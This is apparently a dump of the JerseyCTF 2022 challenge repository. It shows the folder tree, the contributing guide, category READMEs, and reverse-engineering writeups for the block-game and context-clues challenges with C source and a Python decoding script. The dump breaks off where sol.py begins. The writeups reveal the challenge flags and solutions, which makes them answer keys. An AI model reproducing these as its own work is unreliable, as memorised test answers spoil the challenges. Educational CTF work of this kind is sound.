├── .github ├── CODE_OF_CONDUCT.md └── contributing.md ├── .gitignore ├── LICENSE ├── README.md ├── bin ├── README.md ├── block-game │ ├── README.md │ └── challenge │ │ └── MyModule-0.1.0-SNAPSHOT.jar ├── context-clues │ ├── README.md │ ├── challenge │ │ └── context-clues │ ├── context-clues.c │ └── sol.py ├── going-over │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── files │ │ ├── flag.txt │ │ └── src.c │ │ ├── going-over │ │ ├── solver.py │ │ └── ynetd ├── kangaroo │ ├── README.md │ ├── challenge │ │ └── kangaroo │ ├── kangaroo-gen.tar.gz │ ├── kangaroo.c │ └── sol │ │ ├── accepts.txt │ │ ├── jumps.txt │ │ ├── perms.txt │ │ └── solution.py ├── misdirection │ ├── README.md │ └── challenge │ │ └── misdirection ├── patches │ ├── README.md │ └── challenge │ │ ├── Makefile │ │ ├── dump.txt │ │ ├── patches │ │ └── patches.c ├── symbolism │ ├── README.md │ ├── challenge │ │ └── symbolism.vbin │ └── symbolism.lisp └── win-bin-analysis │ ├── README.md │ ├── challenge │ └── winBinAnalysis.zip │ └── src.cs ├── createWriteup.py ├── crypto ├── README.md ├── audio-transmission │ └── README.md ├── file-zip-cracker │ ├── README.md │ ├── challenge │ │ ├── FileZipCracker_Challenge_Version.py │ │ ├── actorList.txt │ │ └── secret_folder.zip │ └── solution │ │ ├── FileZipCracker.py │ │ ├── actorList.txt │ │ ├── secret_folder.zip │ │ └── secret_folder │ │ ├── compressed_file.zip │ │ ├── compressed_file │ │ └── Flag.gif │ │ └── msg.txt ├── hidden-in-plain-sight │ ├── README.md │ └── challenge │ │ ├── encrypted.pco │ │ └── encryption.py ├── inDEStructible │ ├── README.md │ ├── challenge │ │ └── clearence_code │ └── solution │ │ └── pydes.py ├── new-algorithm │ └── README.md ├── salad │ └── README.md ├── secret-message │ ├── README.md │ ├── challenge │ │ ├── Photo.jpg │ │ └── secret_key.txt │ └── sol │ │ ├── Photo.jpg │ │ ├── secret_key.txt │ │ └── secret_message.txt ├── would-you-wordle │ ├── README.md │ └── challenge │ │ └── Wordle-Words.jpg └── xoracle │ ├── README.md │ └── challenge │ ├── Dockerfile │ ├── flag.txt │ └── xoracle.py ├── forensics ├── README.md ├── corrupted-file │ ├── README.md │ ├── challenge │ │ └── flag_mod.jpg │ └── solution │ │ └── flag.jpg ├── data-backup │ ├── README.md │ └── challenge │ │ └── data-backup ├── infected │ └── README.md ├── recent-memory │ └── README.md ├── scavenger-hunt │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── files │ │ └── folder │ │ │ └── .secret_folder │ │ │ └── flag.txt │ │ └── package │ │ ├── notaflag_1.0-1 │ │ ├── DEBIAN │ │ │ └── control │ │ └── usr │ │ │ └── share │ │ │ └── man │ │ │ └── man1 │ │ │ └── notaflag.1 │ │ └── src.c ├── speedy-at-midi │ ├── README.md │ └── challenge │ │ ├── riff.mid │ │ └── riff.mp3 └── stolen-data │ ├── README.md │ └── challenge │ └── stolen_data.pcap ├── makeChallenge.py ├── misc ├── README.md ├── bank-clients │ ├── README.md │ └── challenge │ │ └── clients.kdbx ├── check-the-shadows │ ├── README.md │ └── challenge │ │ └── shadow ├── dnsmasq-ip-extract │ ├── README.md │ ├── challenge │ │ └── dnsmasq-ip-extract-dnsmasq.log │ └── sol │ │ ├── dnsmasq-ip-extract-answer-list.txt │ │ ├── dnsmasq-ip-extract-challenge-generator.py │ │ ├── dnsmasq-ip-extract-flag.txt │ │ └── solution_scripts │ │ ├── dnsmasq-ip-extract-solution.ps1 │ │ └── dnsmasq-ip-extract-solution.py ├── filtered-feeders │ ├── README.md │ └── challenge │ │ └── herrings.png ├── firewall-rules │ ├── README.md │ └── challenge │ │ └── firewall rules.xlsx ├── root-me │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ └── flag.txt ├── snort-log │ ├── README.md │ └── challenge │ │ └── snort.log └── we-will │ ├── README.md │ └── challenge │ └── flag.zip ├── osint ├── README.md ├── contributor │ ├── README.md │ └── other │ │ ├── forgot_password.php │ │ ├── headshot.png │ │ └── index.php ├── dns-joke │ └── README.md ├── mystery │ ├── README.md │ └── challenge │ │ └── mystery.JPG ├── photo-op-spot │ ├── README.md │ └── challenge │ │ └── photo-op-spot.JPG ├── rarity │ ├── README.md │ └── challenge │ │ └── picture.png └── sho-me-whats-wrong │ └── README.md ├── sponker └── README.md ├── web ├── README.md ├── apache-logs │ ├── README.md │ └── challenge │ │ └── webtraffic.log ├── buster │ ├── README.md │ └── challenge │ │ └── buster.py ├── cookie-factory │ ├── README.md │ └── challenge │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── requirements.txt │ │ ├── static │ │ └── cookie.png │ │ └── templates │ │ ├── base.html │ │ ├── dashboard.html │ │ ├── error.html │ │ ├── index.html │ │ └── login.html ├── flag-vault │ ├── README.md │ └── challenge │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── requirements.txt │ │ ├── static │ │ └── flag.png │ │ └── templates │ │ ├── base.html │ │ ├── error.html │ │ ├── flags.html │ │ ├── index.html │ │ └── login.html ├── heres-my-password │ ├── README.md │ ├── challenge │ │ └── users.txt │ ├── forgot_password.php │ └── index.php ├── road-not-taken │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── flag.txt │ │ ├── httpd.conf │ │ ├── index.html │ │ └── jerseyctfiilogowithtext.png └── seigwards-secrets │ ├── README.md │ └── challenge │ ├── index.html │ └── login.js └── writeups ├── README.md ├── apache-logs └── .keep ├── audio-transmission └── .keep ├── bank-clients └── .keep ├── block-game └── .keep ├── buster └── .keep ├── check-the-shadows └── .keep ├── context-clues └── .keep ├── contributor └── .keep ├── cookie-factory └── .keep ├── corrupted-file └── .keep ├── data-backup └── .keep ├── dns-joke └── .keep ├── dnsmasq-ip-extract └── .keep ├── file-zip-cracker └── .keep ├── filtered-feeders └── .keep ├── firewall-rules └── .keep ├── flag-vault └── .keep ├── going_over └── .keep ├── heres-my-password └── .keep ├── hidden-in-plain-sight └── .keep ├── inDEStructible └── .keep ├── infected └── .keep ├── kangaroo └── .keep ├── misdirection └── .keep ├── mystery └── .keep ├── new-algorithm └── .keep ├── patches └── .keep ├── photo-op-spot └── .keep ├── rarity └── .keep ├── recent-memory └── .keep ├── road-not-taken └── .keep ├── root-me └── .keep ├── salad └── .keep ├── scavenger-hunt └── .keep ├── secret-message └── .keep ├── seigwards-secrets └── .keep ├── sho-me-whats-wrong └── .keep ├── snort-log └── .keep ├── speedy-at-midi └── .keep ├── stolen-data └── .keep ├── symbolism └── .keep ├── we-will └── .keep ├── win-bin-analysis └── .keep ├── would-you-wordle └── .keep └── xoracle └── .keep /.github/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | acm@njit.edu. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /.github/contributing.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | * Your one stop shop for contributing! 4 | 5 | --- 6 | ## How to Contribute 7 | 8 | ### Creating a challenge 9 | * **Be sure your flag looks like `jctf{your_text_here}`** 10 | 11 | 1. Go to Directory of category that you wish to create a challenge for 12 | 13 | | Categories 14 | | :-- 15 | | [crypto](../crypto) 16 | | [forensics](../forensics) 17 | | [misc](../misc) 18 | | [bin](../bin) 19 | | [web](../web) 20 | | [osint](../osint) 21 | 22 | 1. Run `python3 ../makeChallenge.py ` and this will automatically instantiate all the standardization to make a challenge. 23 | - _NB: This assumes you have followed Step 1_ 24 | * Be sure that ChallengeName is `one word` (has no space) or `encapsulated by single quotes` 25 | * Feel free to add new files or folders that aren't part of the standardization process 26 | * _Try not to deviate, unless necessary_ 27 | 28 | 1. Once you finish to **Remember to Append that Challenge to the README.md in that Category Directory based on Difficulty** 29 | 30 | | README.md's Categories 31 | | :-- 32 | | [crypto/README.md](../crypto/README.md) 33 | | [forensics/README.md](../forensics/README.md) 34 | | [misc/README.md](../misc/README.md) 35 | | [bin/README.md](../bin/README.md) 36 | | [web/README.md](../web/README.md) 37 | | [osint/README.md](../osint/README.md) 38 | 39 | --- 40 | ### Creating a writeup for a challenge 41 | * *Helping both Beginners and More Seasoned Github Users* 42 | 43 | #### For Github Beginners 44 | 1. **Fork** github repository 45 | ![](https://assets.digitalocean.com/articles/eng_python/PullRequest/GitHub_Repo.gif) 46 | 1. _**(In a terminal)**_ **Clone** forked repository and move to cloned Directory 47 | * `git clone https://github.com//ctf-challenges.git` 48 | * `cd ctf-challenges` 49 | 1. **Create** and **Switch** to new branch 50 | * `git checkout -b ` 51 | * Preferably `` is name challenge(s) 52 | 1. Change Directory into writeups and into challenge that you have / want to make a write-up for 53 | * `cd writeups/` 54 | 1. Run `python3 ../../createWriteup.py ` 55 | * This will create a structure that looks like this: 56 | ```txt 57 | +--- 58 | | \--- 59 | | \--- 60 | | +--- README.md 61 | ``` 62 | 1. Put all custom files / scripts that helped with the answering of the problem in the `` directory. Basically anything necessary goes in solution 63 | 1. Document your method in the `README.md` file which is located in the `/` directory 64 | 1. Change Directory until you are at `ctf-challegnges/writeups` 65 | 1. Git Add Files 66 | * `git add .` 67 | 1. Git Commit 68 | * `git commit -m ""` 69 | 1. Git Push 70 | * `git push origin ` 71 | 1. With everything pushed onto Github, [follow this last tutorial](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) and you should be on your way! 72 | 73 | --- 74 | 75 | ### For More Experienced Github Frequenters 76 | 1. Create a fork of Github repo, and 77 | 1. Change directory into `writeups/`, with `` being the challenge the writeup is written for 78 | 1. Run `python3 ../../createWriteup.py ` 79 | * This will standardized the writeups in the repository 80 | 1. Dump any scripts/file in `` directory located in `writeups///` and describe Method in `writeups///README.md` 81 | 1. Create a PR Request from 82 | * _Note_: Organizers may request edits on your PR 83 | 1. Wait and Drink Campagne during the Code Review process (if you are of the legal age) 84 | * _Note_: Will probably only check if the proper steps have been taken to create the writeup 85 | 86 | 87 | ## DM / PM any of the organizers to help with the writeup process 88 | 89 | --- 90 | ## Resources 91 | * [Markdown Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) 92 | * [DigitalOcean - How to create a Pull Request](https://www.digitalocean.com/community/tutorials/how-to-create-a-pull-request-on-github) 93 | * [Github Docs - Creating a Pull Request](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) 94 | * [Generate ASCII Tree Structures](https://cmatskas.com/generate-ascii-folder-structures-for-windows-with-tree/) 95 | 96 | --- 97 | ## Last Resort 98 | Contact `Logan R#7154` or `AndersOrve#9714` on Discord if clarification or help is needed 99 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 NJIT ACM 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jerseyctf-2022-challenges 2 | 3 | Development of Challenges for JerseyCTF 2022, hosted by [NJIT ACM](https://njit.acm.org) / [NJIT SCI](https://sci.njit.edu) and co-sponsored by [NJCCIC](https://www.cyber.nj.gov). 4 | 5 |

6 | 7 | --- 8 | 9 | ## General Info 10 | 11 | ### Challenges 12 | | Categories | Description 13 | | :----: | :-----: 14 | | [crypto](crypto) | Cryptography 15 | | [forensics](forensics) | Forensics 16 | | [bin](bin) | Reversing, binary exploitation 17 | | [web](web) | All types of web exploitation 18 | | [osint](osint) | Open-source intelligence 19 | | [misc](misc) | "Potpourri", any challenges! 20 | 21 | --- 22 | 23 | ## Interested in Contributing Challenges or Writeups? 24 | * Check out [contributing.md](.github/contributing.md) 25 | 26 | --- 27 | 28 | ## Additional Resources 29 | * [Tech Talk Playlist](https://youtube.com/playlist?list=PLrcTWWy-esnCuaiEMSj6Bst4phnq-Qg6B) 30 | * [Information and Registration Site](https://jerseyctf.com) 31 | * [2021 GitHub Repository](https://github.com/njitacm/jerseyctf-2021-challenges) 32 | 33 | --- 34 | 35 | ## Promotional Poster and Schedule 36 | 37 |

38 |

39 | 40 | 41 | -------------------------------------------------------------------------------- /bin/README.md: -------------------------------------------------------------------------------- 1 | # BIN 2 | 3 | - BIN --> Binary Exploitation + Reversing 4 | 5 | ## Easy Challenges 6 | | Challenge Name | Description | Hint 7 | |:-- | :-- | :--- 8 | | [patches](patches) | Given an objdump of an executable, figure out what hexadecimal instructions are needed to nop to get the jctf flag to stdout | The [Intel Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf) might be overkill, but maybe reviewing Intel Assembly and their corresponding opcodes might help to crack the challenge. **Simply enter the opcodes** 9 | | [misdirection](misdirection) | Where'd the flag go? | There are many ways to solve this challenge, some of which are much easier than others. 10 | | [win-bin-analysis](win-bin-analysis) | Find the key hidden in the Windows executable files. | .exe's arent the only type of executable file. 11 | 12 | ## Medium Challenges 13 | | Challenge Name | Description | Hint 14 | |:-- | :-- | :--- 15 | | [context-clues](context-clues) | Everyone made a big deal about C++ getting coroutines in 2020, but C has had them for decades if you know where to look. | Remember to look up terms and function names you've never heard of. 16 | | [block-game](block-game) | There's mining, and there's crafting, but something seems off... | This doesn't look like a standalone program, I wonder if it depends on something else to run. 17 | | [going-over](going_over) | My friends said they were going on a trip but I think they ran into some trouble... nc 0.cloud.chals.io 10197. They sent me these two files before we lost contact ([src.c](challenge/files/src.c) and [going-over](challenge/going-over)) | If only there were a way to find the exact location of the ledge... like if the ledge had an address or something 18 | 19 | ## Hard Challenges 20 | | Challenge Name | Description | Hint 21 | |:-- | :-- | :--- 22 | | [symbolism](symbolism) | My friend sent me this weird file. Whenever I ask him what it is, he just keeps saying something about symbols. | https://archives.loomcom.com/genera/genera-install.html 23 | | [kangaroo](kangaroo) | I'm feeling pretty JUMPY today. Can you give me a nice flag to JUMP on? | There's a lot of code, but most of it seems pretty similar. Try to look at the bigger picture. 24 | -------------------------------------------------------------------------------- /bin/block-game/README.md: -------------------------------------------------------------------------------- 1 | # block-game 2 | 3 | ## Challenge Text 4 | * There's mining, and there's crafting, but something seems off... 5 | 6 | ## Hint 7 | * This doesn't look like a standalone program, I wonder if it depends on something else to run... 8 | * If you're getting a command not found error, try building the game from source 9 | 10 | ## Solution 11 | 12 | Reverse engineering challenge with a module for the game Terasology 13 | 14 | JAR files are just `.zip` files with a different extension; there are various ways to view the contents (without decompiling): 15 | 16 | * Use the `jar` command line tool to extract it 17 | * Rename the file and use `unzip` or a similar tool 18 | * Use a GUI tool like 7zip 19 | * Use Vim or Neovim to explore the archive without extracting it 20 | 21 | Then you can also decompile it to see the source code; note that the JAR also contains assets that aren't code, so both of these steps are important. 22 | I usually decompile JAR files by googling "java decompiler online" or something similar and clicking on one of the first results; 23 | there are command line tools like `jadx` that work too (and are probably faster if you have them installed). 24 | Java class files retain quite a bit of information, so the result is pretty readable. 25 | 26 | In any case, you should be able to notice the string "terasology" in several places; 27 | if you look this up, you'll find that it's an open source game similar to Minecraft. 28 | The JAR file is a Terasology "module"; similar to a mod, but using an official API for extending the game. 29 | 30 | Figuring out what's going on takes a little bit of research into how Terasology works; 31 | at a high level, the module creates 5 types of entities and a command called `printFlag` for the in-game console. 32 | The command sends an event to all entities of the first type with some data; 33 | then this entity transforms it a little bit and sends it to the next one through another event, 34 | all the way to the last one which prints the result (the flag) to the in-game console. 35 | As long as there's at least one entity of each type in the world, this results in the flag being printed out when the command is run. 36 | (If one entity is missing, there's no one to receive one of the events in the chain and the data doesn't make it to the end.) 37 | There's also some other indirection to throw you off, like duplicate events being sent to entities that don't have handlers for them, 38 | and the fact that the names of all of the classes and entities are just random words. 39 | 40 | From here, we can get the flag either statically or dynamically: 41 | 42 | ### Static 43 | 44 | The transformations at each stage are fairly simple, so we can just write a short script to generate the flag ourselves. 45 | Here's a Python script: 46 | 47 | ```py 48 | # Starting values from RedSystem.DATA 49 | buf = [104, 65, 111, -41, 119, -19, -59, 19, 118, 102, 92, -35, 70, -92, -49, -33, 61, -74, -17, -90, -128, 31, -86, -94, 67, -55, 16, -67, 91, -113, 63, 41, 81, 49, -75, 103, 79] 50 | # Java only supports signed bytes; we can use this trick to make sure Python's binary representation is the same as Java's 51 | buf = [x & 0xFF for x in buf] 52 | 53 | # BlueSystem.DATA 54 | blue = [-70, 74, -118, -9, 37, 105, 69, -119, 103, -88, 91, 19, -58, -58, -19, -16, 100, 65, 42, 79, 27, -45, -125, -38, 119, 8, -121, -8, 67, 71, -2, 62, -34, 93, 0, -116, 54] 55 | # Same trick as before 56 | blue = [x & 0xFF for x in blue] 57 | 58 | # OrangeSystem.onCrystal 59 | for i in range(len(buf)): 60 | buf[i] = (~buf[i]) & 0xFF 61 | 62 | # YellowSystem.onGracious 63 | for i in range(len(buf)): 64 | buf[i] ^= 0x47 65 | 66 | # GreenSystem.onCruel 67 | for i in range(1, len(buf)): 68 | buf[i] ^= buf[i-1] 69 | 70 | # BlueSystem.onPrecious 71 | for i in range(len(buf)): 72 | buf[i] ^= blue[i] 73 | 74 | # PurpleSystem.onGraceful 75 | flag = bytes(buf) 76 | print(flag) 77 | ``` 78 | 79 | This approach has the advantage that it doesn't require downloading/setting up the game, but it also requires more precise reverse engineering. 80 | 81 | ### Dynamic 82 | 83 | You can download the game by cloning the [official Github repository](https://github.com/MovingBlocks/Terasology). 84 | You need to have Java 11 or newer installed to run the game. 85 | Then, in the game directory, you can run `./groovyw module recurse CoreSampleGameplay` to install the CoreSampleGameplay gameplay template 86 | (you need at least one to create a world, since *all* of Terasology's content is implemented through modules). 87 | Then you can copy the provided JAR file into the `modules` folder, start the game with `./gradlew jar game`, 88 | and create a new world with `My Module` selected on the Advanced page of the world creation dialog. 89 | 90 | When the world loads, you can press `F1` or grave to open the in-game console. 91 | Use the `spawnPrefab` command to spawn one of each entity (`AridEntity`, `ArcticEntity`, `BleakEntity`, `CanineEntity`, and `EarlyEntity`). 92 | Finally, you can run the `printFlag` command to get the flag. 93 | 94 | This approach has the advantage that you don't need to do as much reverse engineering, but figuring out how to set up the game might be a bit of a hassle. 95 | 96 | Flag: `jctf{b3Tter_th4N_tH3_0r1giN4l_a093c0}` 97 | 98 | ## Credit 99 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 100 | 101 | -------------------------------------------------------------------------------- /bin/block-game/challenge/MyModule-0.1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/block-game/challenge/MyModule-0.1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /bin/context-clues/README.md: -------------------------------------------------------------------------------- 1 | # context-clues 2 | 3 | ## Challenge Text 4 | * Everyone made a big deal about C++ getting coroutines in 2020, but C has had them for decades if you know where to look. 5 | 6 | ## Hint 7 | * Remember to look up terms and function names you've never heard of. 8 | 9 | ## Solution 10 | 11 | Reversing challenge using POSIX `makecontext`/`getcontext`/`swapcontext` functions 12 | 13 | Most of the solution entails knowing what these library functions do; from there, it's pretty simple to figure out what the program is doing. 14 | `main` calls `func1` using its context, then `func1` passes control back and forth to `func2` a few times before they return. 15 | Each function performs some transformations on the input buffer, 16 | but tracing these transformations gets complicated because control gets passed back and forth in the middle of loops. 17 | After the transformations, `main` checks if the buffer is equal to some expected value. 18 | 19 | We could try to trace these transformations to work backwards from the expected value and get the original, but there's also a more clever approach. 20 | Using Z3, we can make an array of bit vectors, then simulate the transformations on that array, and add the constraint that the result must be equal to the expected value. 21 | Then, the solver should tell us the original input, which should be the flag. 22 | We can simulate the context switches using Python's implementation of coroutines (generators). 23 | To do this, we make one function a generator, and use `next` to pass control to that function, and `yield` to pass control back. 24 | The syntax looks a little bit strange because this isn't really what generators are intended to be used for, but it's effectively equivalent to what the binary does. 25 | See (sol.py)[sol.py] for an implementation of this solution. 26 | 27 | * Flag: `jctf{0b5OL3sc3nCe_rU1e5_209g9ax}` 28 | 29 | ## Credit 30 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 31 | -------------------------------------------------------------------------------- /bin/context-clues/challenge/context-clues: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/context-clues/challenge/context-clues -------------------------------------------------------------------------------- /bin/context-clues/context-clues.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static volatile char inp[32]; 7 | static const char expected[32] = 8 | {0x6a, 0x63, 0x39, 0x30, 0x2e, 0x2b, 0x34, 0x4e, 0x4c, 0x1b, 0x4f, 0x2d, 0x5b, 0xb, 0x79, 0x1c, 0x20, 0x7b, 0xa, 0x6b, 0x4f, 0x20, 0x11, 0x72, 0x70, 0x23, 0x63, 0x77, 0x18, 0x3a, 0x6a, 0x5e}; 9 | static ucontext_t ctx1, ctx2, ctx_main; 10 | 11 | static char stack1[SIGSTKSZ], stack2[SIGSTKSZ]; 12 | 13 | #define SWP(i1, i2) { \ 14 | int tmp = inp[i1]; \ 15 | inp[i1] = inp[i2]; \ 16 | inp[i2] = tmp; \ 17 | } 18 | 19 | void func1() { 20 | for (int i = 6; i < 28; i++) { 21 | inp[i] ^= 0x37; 22 | if (i == 16) { 23 | swapcontext(&ctx1, &ctx2); 24 | } 25 | } 26 | 27 | SWP(24, 5) 28 | 29 | for (int i = 3; i < 22; i++) { 30 | inp[i] ^= inp[i-1]; 31 | if (i == 7) { 32 | swapcontext(&ctx1, &ctx2); 33 | } 34 | } 35 | 36 | SWP(9, 6) 37 | 38 | for (int i = 13; i < 30; i++) { 39 | SWP(12, i) 40 | if (i == 21) { 41 | swapcontext(&ctx1, &ctx2); 42 | } 43 | } 44 | 45 | SWP(15, 27) 46 | } 47 | 48 | void func2() { 49 | for (int i = 3; i < 29; i++) { 50 | SWP(2, i) 51 | if (i == 11) { 52 | swapcontext(&ctx2, &ctx1); 53 | } 54 | } 55 | 56 | SWP(20, 11) 57 | 58 | for (int i = 12; i < 32; i++) { 59 | inp[i] ^= inp[i-1]; 60 | if (i == 20) { 61 | swapcontext(&ctx2, &ctx1); 62 | } 63 | } 64 | 65 | SWP(27, 30) 66 | 67 | for (int i = 4; i < 18; i++) { 68 | inp[i] ^= 0x78; 69 | if (i == 14) { 70 | swapcontext(&ctx2, &ctx1); 71 | } 72 | } 73 | 74 | SWP(28, 25) 75 | } 76 | 77 | int main(int argc, char **argv) { 78 | if (argc != 2) { 79 | fprintf(stderr, "Usage: %s \n", argv[0]); 80 | return 1; 81 | } 82 | 83 | if (strlen(argv[1]) != 32) { 84 | puts("Invalid"); 85 | return 0; 86 | } 87 | 88 | memcpy((void *) inp, argv[1], 32); 89 | 90 | getcontext(&ctx1); 91 | ctx1.uc_stack.ss_sp = stack1; 92 | ctx1.uc_stack.ss_size = sizeof(stack1); 93 | ctx1.uc_link = &ctx2; 94 | makecontext(&ctx1, func1, 0); 95 | 96 | getcontext(&ctx2); 97 | ctx2.uc_stack.ss_sp = stack2; 98 | ctx2.uc_stack.ss_size = sizeof(stack2); 99 | ctx2.uc_link = &ctx_main; 100 | makecontext(&ctx2, func2, 0); 101 | 102 | swapcontext(&ctx_main, &ctx1); 103 | 104 | /*for (int i = 0; i < 32; i++) { 105 | printf("0x%hhx, ", inp[i]); 106 | }*/ 107 | 108 | if (memcmp((void *) inp, expected, 32) == 0) { 109 | puts("Valid"); 110 | } else { 111 | puts("Invalid"); 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /bin/context-clues/sol.py: 